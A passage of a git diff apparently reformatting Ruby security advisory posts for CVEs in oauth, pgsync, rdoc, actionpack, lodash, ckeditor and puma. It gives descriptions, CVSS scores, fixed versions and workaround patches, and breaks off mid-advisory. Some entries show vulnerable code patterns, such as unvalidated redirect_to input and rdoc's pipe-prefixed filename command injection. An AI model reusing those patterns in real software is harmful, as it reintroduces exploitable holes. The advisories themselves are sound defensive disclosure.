-    lib/oauth/consumer.rb in the oauth-ruby gem through 0.5.4 for Ruby does
-    not verify server X.509 certificates if a certificate bundle cannot be found, which
-    allows man-in-the-middle attackers to spoof servers and obtain sensitive information.
-  cvss_v3: 7.4
-  patched_versions:
-  - ">= 0.5.5"
----
+---
+layout: advisory
+title: 'CVE-2016-11086 (oauth): Improper Certificate Validation in oauth ruby gem'
+comments: false
+categories:
+- oauth
+advisory:
+  gem: oauth
+  cve: 2016-11086
+  ghsa: 7359-3c6r-hfc2
+  url: https://github.com/advisories/GHSA-7359-3c6r-hfc2
+  date: 2021-04-22
+  title: Improper Certificate Validation in oauth ruby gem
+  description: |
+    lib/oauth/consumer.rb in the oauth-ruby gem through 0.5.4 for Ruby does
+    not verify server X.509 certificates if a certificate bundle cannot be found, which
+    allows man-in-the-middle attackers to spoof servers and obtain sensitive information.
+  cvss_v3: 7.4
+  patched_versions:
+  - ">= 0.5.5"
+---
diff --git a/advisories/_posts/2021-04-26-CVE-2021-31671.md b/advisories/_posts/2021-04-26-CVE-2021-31671.md
index 7d0a2550..9928e2a0 100644
--- a/advisories/_posts/2021-04-26-CVE-2021-31671.md
+++ b/advisories/_posts/2021-04-26-CVE-2021-31671.md
@@ -1,35 +1,35 @@
----
-layout: advisory
-title: 'CVE-2021-31671 (pgsync): Connection security vulnerability with schema sync'
-comments: false
-categories:
-- pgsync
-advisory:
-  gem: pgsync
-  cve: 2021-31671
-  ghsa: 72rj-36qc-47g7
-  url: https://github.com/ankane/pgsync/issues/121
-  title: Connection security vulnerability with schema sync
-  date: 2021-04-26
-  description: |
-    pgsync drops connection parameters when syncing the schema with the
-    --schema-first and --schema-only options. Some of these parameters may
-    affect security. For instance, if sslmode is dropped, the connection
-    may not use SSL. The first connection parameter is not affected.
-
-    pgsync drops connection parameters when syncing the schema with the
-    `--schema-first` and `--schema-only` options. Some of these parameters
-    may affect security. For instance, if `sslmode` is dropped, the
-    connection may not use SSL. The first connection parameter is not affected.
-
-    An example where `sslmode` is dropped (`connect_timeout` is not affected):
-
-    ```yaml
-    from: postgres://user:pass@host/dbname?connect_timeout=10&sslmode=require
-    ```
-
-    This applies to both the `to` and `from` connections.
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 0.6.7"
----
+---
+layout: advisory
+title: 'CVE-2021-31671 (pgsync): Connection security vulnerability with schema sync'
+comments: false
+categories:
+- pgsync
+advisory:
+  gem: pgsync
+  cve: 2021-31671
+  ghsa: 72rj-36qc-47g7
+  url: https://github.com/ankane/pgsync/issues/121
+  title: Connection security vulnerability with schema sync
+  date: 2021-04-26
+  description: |
+    pgsync drops connection parameters when syncing the schema with the
+    --schema-first and --schema-only options. Some of these parameters may
+    affect security. For instance, if sslmode is dropped, the connection
+    may not use SSL. The first connection parameter is not affected.
+
+    pgsync drops connection parameters when syncing the schema with the
+    `--schema-first` and `--schema-only` options. Some of these parameters
+    may affect security. For instance, if `sslmode` is dropped, the
+    connection may not use SSL. The first connection parameter is not affected.
+
+    An example where `sslmode` is dropped (`connect_timeout` is not affected):
+
+    ```yaml
+    from: postgres://user:pass@host/dbname?connect_timeout=10&sslmode=require
+    ```
+
+    This applies to both the `to` and `from` connections.
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 0.6.7"
+---
diff --git a/advisories/_posts/2021-05-02-CVE-2021-31799.md b/advisories/_posts/2021-05-02-CVE-2021-31799.md
index beb5e31f..d2a619aa 100644
--- a/advisories/_posts/2021-05-02-CVE-2021-31799.md
+++ b/advisories/_posts/2021-05-02-CVE-2021-31799.md
@@ -1,27 +1,27 @@
----
-layout: advisory
-title: 'CVE-2021-31799 (rdoc): RDoc OS command injection vulnerability'
-comments: false
-categories:
-- rdoc
-advisory:
-  gem: rdoc
-  cve: 2021-31799
-  ghsa: ggxm-pgc9-g7fp
-  url: https://www.ruby-lang.org/en/news/2021/05/02/os-command-injection-in-rdoc/
-  title: RDoc OS command injection vulnerability
-  date: 2021-05-02
-  description: |
-    RDoc used to call `Kernel#open` to open a local file. If a Ruby project has
-    a file whose name starts with `|` and ends with `tags`, the command following
-    the pipe character is executed. A malicious Ruby project could exploit it to
-    run an arbitrary command execution against a user who attempts to run `rdoc`
-    command.
-  cvss_v3: 7.0
-  unaffected_versions:
-  - "< 3.11.0"
-  patched_versions:
-  - "~> 6.1.2.1"
-  - "~> 6.2.1.1"
-  - ">= 6.3.1"
----
+---
+layout: advisory
+title: 'CVE-2021-31799 (rdoc): RDoc OS command injection vulnerability'
+comments: false
+categories:
+- rdoc
+advisory:
+  gem: rdoc
+  cve: 2021-31799
+  ghsa: ggxm-pgc9-g7fp
+  url: https://www.ruby-lang.org/en/news/2021/05/02/os-command-injection-in-rdoc/
+  title: RDoc OS command injection vulnerability
+  date: 2021-05-02
+  description: |
+    RDoc used to call `Kernel#open` to open a local file. If a Ruby project has
+    a file whose name starts with `|` and ends with `tags`, the command following
+    the pipe character is executed. A malicious Ruby project could exploit it to
+    run an arbitrary command execution against a user who attempts to run `rdoc`
+    command.
+  cvss_v3: 7.0
+  unaffected_versions:
+  - "< 3.11.0"
+  patched_versions:
+  - "~> 6.1.2.1"
+  - "~> 6.2.1.1"
+  - ">= 6.3.1"
+---
diff --git a/advisories/_posts/2021-05-04-CVE-2021-23383.md b/advisories/_posts/2021-05-04-CVE-2021-23383.md
index 354bf0fe..5de6a113 100644
--- a/advisories/_posts/2021-05-04-CVE-2021-23383.md
+++ b/advisories/_posts/2021-05-04-CVE-2021-23383.md
@@ -1,21 +1,21 @@
----
-layout: advisory
-title: 'CVE-2021-23383 (handlebars-source): Prototype Pollution in handlebars'
-comments: false
-categories:
-- handlebars-source
-advisory:
-  gem: handlebars-source
-  cve: 2021-23383
-  ghsa: 765h-qjxv-5f44
-  url: https://github.com/advisories/GHSA-765h-qjxv-5f44
-  title: Prototype Pollution in handlebars
-  date: 2021-05-04
-  description: |
-    The package handlebars before 4.7.7 are vulnerable to Prototype Pollution when
-    selecting certain compiling options to compile templates coming from an untrusted source.
-    This vulnerability has been assigned the CVE identifier CVE-2021-23383.
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 4.7.7"
----
+---
+layout: advisory
+title: 'CVE-2021-23383 (handlebars-source): Prototype Pollution in handlebars'
+comments: false
+categories:
+- handlebars-source
+advisory:
+  gem: handlebars-source
+  cve: 2021-23383
+  ghsa: 765h-qjxv-5f44
+  url: https://github.com/advisories/GHSA-765h-qjxv-5f44
+  title: Prototype Pollution in handlebars
+  date: 2021-05-04
+  description: |
+    The package handlebars before 4.7.7 are vulnerable to Prototype Pollution when
+    selecting certain compiling options to compile templates coming from an untrusted source.
+    This vulnerability has been assigned the CVE identifier CVE-2021-23383.
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 4.7.7"
+---
diff --git a/advisories/_posts/2021-05-05-CVE-2021-22885.md b/advisories/_posts/2021-05-05-CVE-2021-22885.md
index 733ac3a7..fc3710e1 100644
--- a/advisories/_posts/2021-05-05-CVE-2021-22885.md
+++ b/advisories/_posts/2021-05-05-CVE-2021-22885.md
@@ -1,76 +1,76 @@
----
-layout: advisory
-title: 'CVE-2021-22885 (actionpack): Possible Information Disclosure / Unintended
-  Method Execution in Action Pack'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2021-22885
-  ghsa: hjg4-8q5f-x6fm
-  url: https://groups.google.com/g/rubyonrails-security/c/NiQl-48cXYI
-  title: Possible Information Disclosure / Unintended Method Execution in Action Pack
-  date: 2021-05-05
-  description: |
-    There is a possible information disclosure / unintended method execution
-    vulnerability in Action Pack which has been assigned the CVE identifier
-    CVE-2021-22885.
-
-    Versions Affected:  >= 2.0.0.
-    Not affected:       < 2.0.0.
-    Fixed Versions:     6.1.3.2, 6.0.3.7, 5.2.4.6, 5.2.6
-
-    Impact
-    ------
-    There is a possible information disclosure / unintended method execution
-    vulnerability in Action Pack when using the `redirect_to` or `polymorphic_url`
-    helper with untrusted user input.
-
-    Vulnerable code will look like this:
-
-    ```
-    redirect_to(params[:some_param])
-    ```
-
-    All users running an affected release should either upgrade or use one of the
-    workarounds immediately.
-
-    Workarounds
-    -----------
-    To work around this problem, it is recommended to use an allow list for valid
-    parameters passed from the user.  For example:
-
-    ```
-    private def check(param)
-      case param
-      when "valid"
-        param
-      else
-        "/"
-      end
-    end
-
-    def index
-      redirect_to(check(params[:some_param]))
-    end
-    ```
-
-    Or force the user input to be cast to a string like this:
-
-    ```
-    def index
-      redirect_to(params[:some_param].to_s)
-    end
-    ```
-  cvss_v3: 7.5
-  unaffected_versions:
-  - "< 2.0.0"
-  patched_versions:
-  - "~> 5.2.4.6"
-  - "~> 5.2.6"
-  - "~> 6.0.3, >= 6.0.3.7"
-  - ">= 6.1.3.2"
----
+---
+layout: advisory
+title: 'CVE-2021-22885 (actionpack): Possible Information Disclosure / Unintended
+  Method Execution in Action Pack'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2021-22885
+  ghsa: hjg4-8q5f-x6fm
+  url: https://groups.google.com/g/rubyonrails-security/c/NiQl-48cXYI
+  title: Possible Information Disclosure / Unintended Method Execution in Action Pack
+  date: 2021-05-05
+  description: |
+    There is a possible information disclosure / unintended method execution
+    vulnerability in Action Pack which has been assigned the CVE identifier
+    CVE-2021-22885.
+
+    Versions Affected:  >= 2.0.0.
+    Not affected:       < 2.0.0.
+    Fixed Versions:     6.1.3.2, 6.0.3.7, 5.2.4.6, 5.2.6
+
+    Impact
+    ------
+    There is a possible information disclosure / unintended method execution
+    vulnerability in Action Pack when using the `redirect_to` or `polymorphic_url`
+    helper with untrusted user input.
+
+    Vulnerable code will look like this:
+
+    ```
+    redirect_to(params[:some_param])
+    ```
+
+    All users running an affected release should either upgrade or use one of the
+    workarounds immediately.
+
+    Workarounds
+    -----------
+    To work around this problem, it is recommended to use an allow list for valid
+    parameters passed from the user.  For example:
+
+    ```
+    private def check(param)
+      case param
+      when "valid"
+        param
+      else
+        "/"
+      end
+    end
+
+    def index
+      redirect_to(check(params[:some_param]))
+    end
+    ```
+
+    Or force the user input to be cast to a string like this:
+
+    ```
+    def index
+      redirect_to(params[:some_param].to_s)
+    end
+    ```
+  cvss_v3: 7.5
+  unaffected_versions:
+  - "< 2.0.0"
+  patched_versions:
+  - "~> 5.2.4.6"
+  - "~> 5.2.6"
+  - "~> 6.0.3, >= 6.0.3.7"
+  - ">= 6.1.3.2"
+---
diff --git a/advisories/_posts/2021-05-05-CVE-2021-22902.md b/advisories/_posts/2021-05-05-CVE-2021-22902.md
index 207cdba7..c6fbd8d8 100644
--- a/advisories/_posts/2021-05-05-CVE-2021-22902.md
+++ b/advisories/_posts/2021-05-05-CVE-2021-22902.md
@@ -1,50 +1,50 @@
----
-layout: advisory
-title: 'CVE-2021-22902 (actionpack): Possible Denial of Service vulnerability in Action
-  Dispatch'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2021-22902
-  ghsa: g8ww-46x2-2p65
-  url: https://groups.google.com/g/rubyonrails-security/c/_5ID_ld9u1c
-  title: Possible Denial of Service vulnerability in Action Dispatch
-  date: 2021-05-05
-  description: |
-    There is a possible Denial of Service vulnerability in the Mime type parser of
-    Action Dispatch. This vulnerability has been assigned the CVE identifier
-    CVE-2021-22902.
-
-    Versions Affected:  >= 6.0.0
-    Not affected:       < 6.0.0
-    Fixed Versions:     6.0.3.7, 6.1.3.2
-
-    Impact
-    ------
-    There is a possible Denial of Service vulnerability in Action Dispatch.
-    Carefully crafted Accept headers can cause the mime type parser in Action
-    Dispatch to do catastrophic backtracking in the regular expression engine.
-
-    Workarounds
-    -----------
-    The following monkey patch placed in an initializer can be used to work around
-    the issue:
-
-    ```ruby
-    module Mime
-      class Type
-        MIME_REGEXP = /\A(?:\*\/\*|#{MIME_NAME}\/(?:\*|#{MIME_NAME})(?>\s*#{MIME_PARAMETER}\s*)*)\z/
-      end
-    end
-    ```
-  cvss_v3: 7.5
-  unaffected_versions:
-  - "< 6.0.0"
-  patched_versions:
-  - "~> 6.0.3, >= 6.0.3.7"
-  - ">= 6.1.3.2"
----
+---
+layout: advisory
+title: 'CVE-2021-22902 (actionpack): Possible Denial of Service vulnerability in Action
+  Dispatch'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2021-22902
+  ghsa: g8ww-46x2-2p65
+  url: https://groups.google.com/g/rubyonrails-security/c/_5ID_ld9u1c
+  title: Possible Denial of Service vulnerability in Action Dispatch
+  date: 2021-05-05
+  description: |
+    There is a possible Denial of Service vulnerability in the Mime type parser of
+    Action Dispatch. This vulnerability has been assigned the CVE identifier
+    CVE-2021-22902.
+
+    Versions Affected:  >= 6.0.0
+    Not affected:       < 6.0.0
+    Fixed Versions:     6.0.3.7, 6.1.3.2
+
+    Impact
+    ------
+    There is a possible Denial of Service vulnerability in Action Dispatch.
+    Carefully crafted Accept headers can cause the mime type parser in Action
+    Dispatch to do catastrophic backtracking in the regular expression engine.
+
+    Workarounds
+    -----------
+    The following monkey patch placed in an initializer can be used to work around
+    the issue:
+
+    ```ruby
+    module Mime
+      class Type
+        MIME_REGEXP = /\A(?:\*\/\*|#{MIME_NAME}\/(?:\*|#{MIME_NAME})(?>\s*#{MIME_PARAMETER}\s*)*)\z/
+      end
+    end
+    ```
+  cvss_v3: 7.5
+  unaffected_versions:
+  - "< 6.0.0"
+  patched_versions:
+  - "~> 6.0.3, >= 6.0.3.7"
+  - ">= 6.1.3.2"
+---
diff --git a/advisories/_posts/2021-05-05-CVE-2021-22903.md b/advisories/_posts/2021-05-05-CVE-2021-22903.md
index 7c9c224c..89c75066 100644
--- a/advisories/_posts/2021-05-05-CVE-2021-22903.md
+++ b/advisories/_posts/2021-05-05-CVE-2021-22903.md
@@ -1,60 +1,60 @@
----
-layout: advisory
-title: 'CVE-2021-22903 (actionpack): Possible Open Redirect Vulnerability in Action
-  Pack'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2021-22903
-  ghsa: 5hq2-xf89-9jxq
-  url: https://groups.google.com/g/rubyonrails-security/c/8TxqXEtgSF0
-  title: Possible Open Redirect Vulnerability in Action Pack
-  date: 2021-05-05
-  description: |
-    There is a possible Open Redirect Vulnerability in Action Pack. This
-    vulnerability has been assigned the CVE identifier CVE-2021-22903.
-
-    Versions Affected:  >= v6.1.0.rc2
-    Not affected:       < v6.1.0.rc2
-    Fixed Versions:     6.1.3.2
-
-    Impact
-    ------
-    This is similar to CVE-2021-22881: Specially crafted Host headers in
-    combination with certain "allowed host" formats can cause the Host
-    Authorization middleware in Action Pack to redirect users to a malicious
-    website.
-
-    Since rails/rails@9bc7ea5, strings in config.hosts that do not have a leading
-    dot are converted to regular expressions without proper escaping. This causes,
-    for example, config.hosts << "sub.example.com" to permit a request with a Host
-    header value of sub-example.com.
-
-    Workarounds
-    -----------
-    The following monkey patch put in an initializer can be used as a workaround:
-
-    ```ruby
-    class ActionDispatch::HostAuthorization::Permissions
-      def sanitize_string(host)
-        if host.start_with?(".")
-          /\A(.+\.)?#{Regexp.escape(host[1..-1])}\z/i
-        else
-          /\A#{Regexp.escape host}\z/i
-        end
-      end
-    end
-    ```
-  cvss_v3: 6.1
-  unaffected_versions:
-  - "< 6.1.0.rc2"
-  patched_versions:
-  - ">= 6.1.3.2"
-  related:
-    cve:
-    - 2021-22881
----
+---
+layout: advisory
+title: 'CVE-2021-22903 (actionpack): Possible Open Redirect Vulnerability in Action
+  Pack'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2021-22903
+  ghsa: 5hq2-xf89-9jxq
+  url: https://groups.google.com/g/rubyonrails-security/c/8TxqXEtgSF0
+  title: Possible Open Redirect Vulnerability in Action Pack
+  date: 2021-05-05
+  description: |
+    There is a possible Open Redirect Vulnerability in Action Pack. This
+    vulnerability has been assigned the CVE identifier CVE-2021-22903.
+
+    Versions Affected:  >= v6.1.0.rc2
+    Not affected:       < v6.1.0.rc2
+    Fixed Versions:     6.1.3.2
+
+    Impact
+    ------
+    This is similar to CVE-2021-22881: Specially crafted Host headers in
+    combination with certain "allowed host" formats can cause the Host
+    Authorization middleware in Action Pack to redirect users to a malicious
+    website.
+
+    Since rails/rails@9bc7ea5, strings in config.hosts that do not have a leading
+    dot are converted to regular expressions without proper escaping. This causes,
+    for example, config.hosts << "sub.example.com" to permit a request with a Host
+    header value of sub-example.com.
+
+    Workarounds
+    -----------
+    The following monkey patch put in an initializer can be used as a workaround:
+
+    ```ruby
+    class ActionDispatch::HostAuthorization::Permissions
+      def sanitize_string(host)
+        if host.start_with?(".")
+          /\A(.+\.)?#{Regexp.escape(host[1..-1])}\z/i
+        else
+          /\A#{Regexp.escape host}\z/i
+        end
+      end
+    end
+    ```
+  cvss_v3: 6.1
+  unaffected_versions:
+  - "< 6.1.0.rc2"
+  patched_versions:
+  - ">= 6.1.3.2"
+  related:
+    cve:
+    - 2021-22881
+---
diff --git a/advisories/_posts/2021-05-05-CVE-2021-22904.md b/advisories/_posts/2021-05-05-CVE-2021-22904.md
index bac4c382..816181d2 100644
--- a/advisories/_posts/2021-05-05-CVE-2021-22904.md
+++ b/advisories/_posts/2021-05-05-CVE-2021-22904.md
@@ -1,71 +1,71 @@
----
-layout: advisory
-title: 'CVE-2021-22904 (actionpack): Possible DoS Vulnerability in Action Controller
-  Token Authentication'
-comments: false
-categories:
-- actionpack
-- rails
-advisory:
-  gem: actionpack
-  framework: rails
-  cve: 2021-22904
-  ghsa: 7wjx-3g7j-8584
-  url: https://groups.google.com/g/rubyonrails-security/c/Pf1TjkOBdyQ
-  title: Possible DoS Vulnerability in Action Controller Token Authentication
-  date: 2021-05-05
-  description: |
-    There is a possible DoS vulnerability in the Token Authentication logic in
-    Action Controller.  This vulnerability has been assigned the CVE identifier
-    CVE-2021-22904.
-
-    Versions Affected:  >= 4.0.0
-    Not affected:       < 4.0.0
-    Fixed Versions:     6.1.3.2, 6.0.3.7, 5.2.4.6, 5.2.6
-
-    Impact
-    ------
-    Impacted code uses `authenticate_or_request_with_http_token` or
-    `authenticate_with_http_token` for request authentication.  Impacted code will
-    look something like this:
-
-    ```
-    class PostsController < ApplicationController
-      before_action :authenticate
-
-      private
-
-      def authenticate
-        authenticate_or_request_with_http_token do |token, options|
-          # ...
-        end
-      end
-    end
-    ```
-
-    All users running an affected release should either upgrade or use one of the
-    workarounds immediately.
-
-    Releases
-    --------
-    The fixed releases are available at the normal locations.
-
-    Workarounds
-    -----------
-    The following monkey patch placed in an initializer can be used to work around
-    the issue:
-
-    ```ruby
-    module ActionController::HttpAuthentication::Token
-      AUTHN_PAIR_DELIMITERS = /(?:,|;|\t)/
-    end
-    ```
-  cvss_v3: 7.5
-  unaffected_versions:
-  - "< 4.0.0"
-  patched_versions:
-  - "~> 5.2.4.6"
-  - "~> 5.2.6"
-  - "~> 6.0.3, >= 6.0.3.7"
-  - ">= 6.1.3.2"
----
+---
+layout: advisory
+title: 'CVE-2021-22904 (actionpack): Possible DoS Vulnerability in Action Controller
+  Token Authentication'
+comments: false
+categories:
+- actionpack
+- rails
+advisory:
+  gem: actionpack
+  framework: rails
+  cve: 2021-22904
+  ghsa: 7wjx-3g7j-8584
+  url: https://groups.google.com/g/rubyonrails-security/c/Pf1TjkOBdyQ
+  title: Possible DoS Vulnerability in Action Controller Token Authentication
+  date: 2021-05-05
+  description: |
+    There is a possible DoS vulnerability in the Token Authentication logic in
+    Action Controller.  This vulnerability has been assigned the CVE identifier
+    CVE-2021-22904.
+
+    Versions Affected:  >= 4.0.0
+    Not affected:       < 4.0.0
+    Fixed Versions:     6.1.3.2, 6.0.3.7, 5.2.4.6, 5.2.6
+
+    Impact
+    ------
+    Impacted code uses `authenticate_or_request_with_http_token` or
+    `authenticate_with_http_token` for request authentication.  Impacted code will
+    look something like this:
+
+    ```
+    class PostsController < ApplicationController
+      before_action :authenticate
+
+      private
+
+      def authenticate
+        authenticate_or_request_with_http_token do |token, options|
+          # ...
+        end
+      end
+    end
+    ```
+
+    All users running an affected release should either upgrade or use one of the
+    workarounds immediately.
+
+    Releases
+    --------
+    The fixed releases are available at the normal locations.
+
+    Workarounds
+    -----------
+    The following monkey patch placed in an initializer can be used to work around
+    the issue:
+
+    ```ruby
+    module ActionController::HttpAuthentication::Token
+      AUTHN_PAIR_DELIMITERS = /(?:,|;|\t)/
+    end
+    ```
+  cvss_v3: 7.5
+  unaffected_versions:
+  - "< 4.0.0"
+  patched_versions:
+  - "~> 5.2.4.6"
+  - "~> 5.2.6"
+  - "~> 6.0.3, >= 6.0.3.7"
+  - ">= 6.1.3.2"
+---
diff --git a/advisories/_posts/2021-05-06-CVE-2021-23337.md b/advisories/_posts/2021-05-06-CVE-2021-23337.md
index 44bf3e5c..7934ee21 100644
--- a/advisories/_posts/2021-05-06-CVE-2021-23337.md
+++ b/advisories/_posts/2021-05-06-CVE-2021-23337.md
@@ -1,40 +1,40 @@
----
-layout: advisory
-title: 'CVE-2021-23337 (lodash-rails): Command Injection in lodash'
-comments: false
-categories:
-- lodash-rails
-advisory:
-  gem: lodash-rails
-  cve: 2021-23337
-  ghsa: 35jh-r3h4-6jhm
-  url: https://github.com/advisories/GHSA-35jh-r3h4-6jhm
-  title: Command Injection in lodash
-  date: 2021-05-06
-  description: |
-    lodash versions prior to 4.17.21 are vulnerable to
-    Command Injection via the template function.
-  cvss_v2: 6.5
-  cvss_v3: 7.2
-  patched_versions:
-  - ">= 4.17.21"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-23337
-    - https://github.com/lodash/lodash/commit/3469357cff396a26c363f8c1b5a91dde28ba4b1c
-    - https://snyk.io/vuln/SNYK-JS-LODASH-1040724
-    - https://github.com/lodash/lodash/blob/ddfd9b11a0126db2302cb70ec9973b66baec0975/lodash.js#L14851
-    - https://github.com/lodash/lodash/blob/ddfd9b11a0126db2302cb70ec9973b66baec0975/lodash.js
-    - https://snyk.io/vuln/SNYK-JAVA-ORGFUJIONWEBJARS-1074932
-    - https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1074930
-    - https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1074928
-    - https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBLODASH-1074931
-    - https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1074929
-    - https://www.oracle.com//security-alerts/cpujul2021.html
-    - https://www.oracle.com/security-alerts/cpuoct2021.html
-    - https://www.oracle.com/security-alerts/cpujan2022.html
-    - https://www.oracle.com/security-alerts/cpujul2022.html
-    - https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf
-    - https://security.netapp.com/advisory/ntap-20210312-0006
-    - https://github.com/advisories/GHSA-35jh-r3h4-6jhm
----
+---
+layout: advisory
+title: 'CVE-2021-23337 (lodash-rails): Command Injection in lodash'
+comments: false
+categories:
+- lodash-rails
+advisory:
+  gem: lodash-rails
+  cve: 2021-23337
+  ghsa: 35jh-r3h4-6jhm
+  url: https://github.com/advisories/GHSA-35jh-r3h4-6jhm
+  title: Command Injection in lodash
+  date: 2021-05-06
+  description: |
+    lodash versions prior to 4.17.21 are vulnerable to
+    Command Injection via the template function.
+  cvss_v2: 6.5
+  cvss_v3: 7.2
+  patched_versions:
+  - ">= 4.17.21"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-23337
+    - https://github.com/lodash/lodash/commit/3469357cff396a26c363f8c1b5a91dde28ba4b1c
+    - https://snyk.io/vuln/SNYK-JS-LODASH-1040724
+    - https://github.com/lodash/lodash/blob/ddfd9b11a0126db2302cb70ec9973b66baec0975/lodash.js#L14851
+    - https://github.com/lodash/lodash/blob/ddfd9b11a0126db2302cb70ec9973b66baec0975/lodash.js
+    - https://snyk.io/vuln/SNYK-JAVA-ORGFUJIONWEBJARS-1074932
+    - https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1074930
+    - https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1074928
+    - https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBLODASH-1074931
+    - https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1074929
+    - https://www.oracle.com//security-alerts/cpujul2021.html
+    - https://www.oracle.com/security-alerts/cpuoct2021.html
+    - https://www.oracle.com/security-alerts/cpujan2022.html
+    - https://www.oracle.com/security-alerts/cpujul2022.html
+    - https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf
+    - https://security.netapp.com/advisory/ntap-20210312-0006
+    - https://github.com/advisories/GHSA-35jh-r3h4-6jhm
+---
diff --git a/advisories/_posts/2021-05-07-CVE-2020-9281.md b/advisories/_posts/2021-05-07-CVE-2020-9281.md
index 7c19d9af..d865e6ae 100644
--- a/advisories/_posts/2021-05-07-CVE-2020-9281.md
+++ b/advisories/_posts/2021-05-07-CVE-2020-9281.md
@@ -1,34 +1,34 @@
----
-layout: advisory
-title: 'CVE-2020-9281 (ckeditor): CKEditor 4.0 vulnerability in the HTML Data Processor'
-comments: false
-categories:
-- ckeditor
-advisory:
-  gem: ckeditor
-  cve: 2020-9281
-  ghsa: vcjf-mgcg-jxjq
-  url: https://github.com/ckeditor/ckeditor4
-  title: CKEditor 4.0 vulnerability in the HTML Data Processor
-  date: 2021-05-07
-  description: |
-    A cross-site scripting (XSS) vulnerability in the HTML Data Processor
-    for CKEditor 4.0 before 4.14.0 allows remote attackers to inject arbitrary web script
-    through a crafted "protected" comment (with the cke_protected syntax).
-  cvss_v3: 6.1
-  patched_versions:
-  - ">= 5.1.2"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2020-9281
-    - https://github.com/ckeditor/ckeditor4
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7OJ4BSS3VEAEXPNSOOUAXX6RDNECGZNO/
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/L322YA73LCV3TO7ORY45WQDAFJVNKXBE/
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M4HHYQ6N452XTCIROFMJOTYEUWSB6FR4/
-    - https://www.oracle.com/security-alerts/cpujan2021.html
-    - https://www.oracle.com/security-alerts/cpuoct2020.html
-    - https://www.oracle.com/security-alerts/cpuApr2021.html
-    - https://www.oracle.com/security-alerts/cpuoct2021.html
-    - https://www.oracle.com/security-alerts/cpujan2022.html
-    - https://github.com/advisories/GHSA-vcjf-mgcg-jxjq
----
+---
+layout: advisory
+title: 'CVE-2020-9281 (ckeditor): CKEditor 4.0 vulnerability in the HTML Data Processor'
+comments: false
+categories:
+- ckeditor
+advisory:
+  gem: ckeditor
+  cve: 2020-9281
+  ghsa: vcjf-mgcg-jxjq
+  url: https://github.com/ckeditor/ckeditor4
+  title: CKEditor 4.0 vulnerability in the HTML Data Processor
+  date: 2021-05-07
+  description: |
+    A cross-site scripting (XSS) vulnerability in the HTML Data Processor
+    for CKEditor 4.0 before 4.14.0 allows remote attackers to inject arbitrary web script
+    through a crafted "protected" comment (with the cke_protected syntax).
+  cvss_v3: 6.1
+  patched_versions:
+  - ">= 5.1.2"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-9281
+    - https://github.com/ckeditor/ckeditor4
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7OJ4BSS3VEAEXPNSOOUAXX6RDNECGZNO/
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/L322YA73LCV3TO7ORY45WQDAFJVNKXBE/
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M4HHYQ6N452XTCIROFMJOTYEUWSB6FR4/
+    - https://www.oracle.com/security-alerts/cpujan2021.html
+    - https://www.oracle.com/security-alerts/cpuoct2020.html
+    - https://www.oracle.com/security-alerts/cpuApr2021.html
+    - https://www.oracle.com/security-alerts/cpuoct2021.html
+    - https://www.oracle.com/security-alerts/cpujan2022.html
+    - https://github.com/advisories/GHSA-vcjf-mgcg-jxjq
+---
diff --git a/advisories/_posts/2021-05-11-CVE-2021-29509.md b/advisories/_posts/2021-05-11-CVE-2021-29509.md
index 268b1e09..d174db41 100644
--- a/advisories/_posts/2021-05-11-CVE-2021-29509.md
+++ b/advisories/_posts/2021-05-11-CVE-2021-29509.md
@@ -1,52 +1,52 @@
----
-layout: advisory
-title: 'CVE-2021-29509 (puma): Keepalive Connections Causing Denial Of Service in
-  puma'
-comments: false
-categories:
-- puma
-advisory:
-  gem: puma
-  cve: 2021-29509
-  ghsa: q28m-8xjw-8vr5
-  url: https://github.com/puma/puma/security/advisories/GHSA-q28m-8xjw-8vr5
-  date: 2021-05-11
-  title: Keepalive Connections Causing Denial Of Service in puma
-  description: |
-    ### Impact
-
-    The fix for CVE-2019-16770 was incomplete. The original fix only protected
-    existing connections that had already been accepted from having their
-    requests starved by greedy persistent-connections saturating all threads in
-    the same process. However, new connections may still be starved by greedy
-    persistent-connections saturating all threads in all processes in the
-    cluster.
-
-    A puma server which received more concurrent keep-alive connections than the
-    server had threads in its threadpool would service only a subset of
-    connections, denying service to the unserved connections.
-
-    ### Patches
-
-    This problem has been fixed in puma 4.3.8 and 5.3.1.
-
-    ### Workarounds
-
-    Setting queue_requests false also fixes the issue. This is not advised when
-    using puma without a reverse proxy, such as nginx or apache, because you will
-    open yourself to slow client attacks (e.g. [slowloris][1]).
-
-    The fix is very small. [A git patch is available here][2] for those using
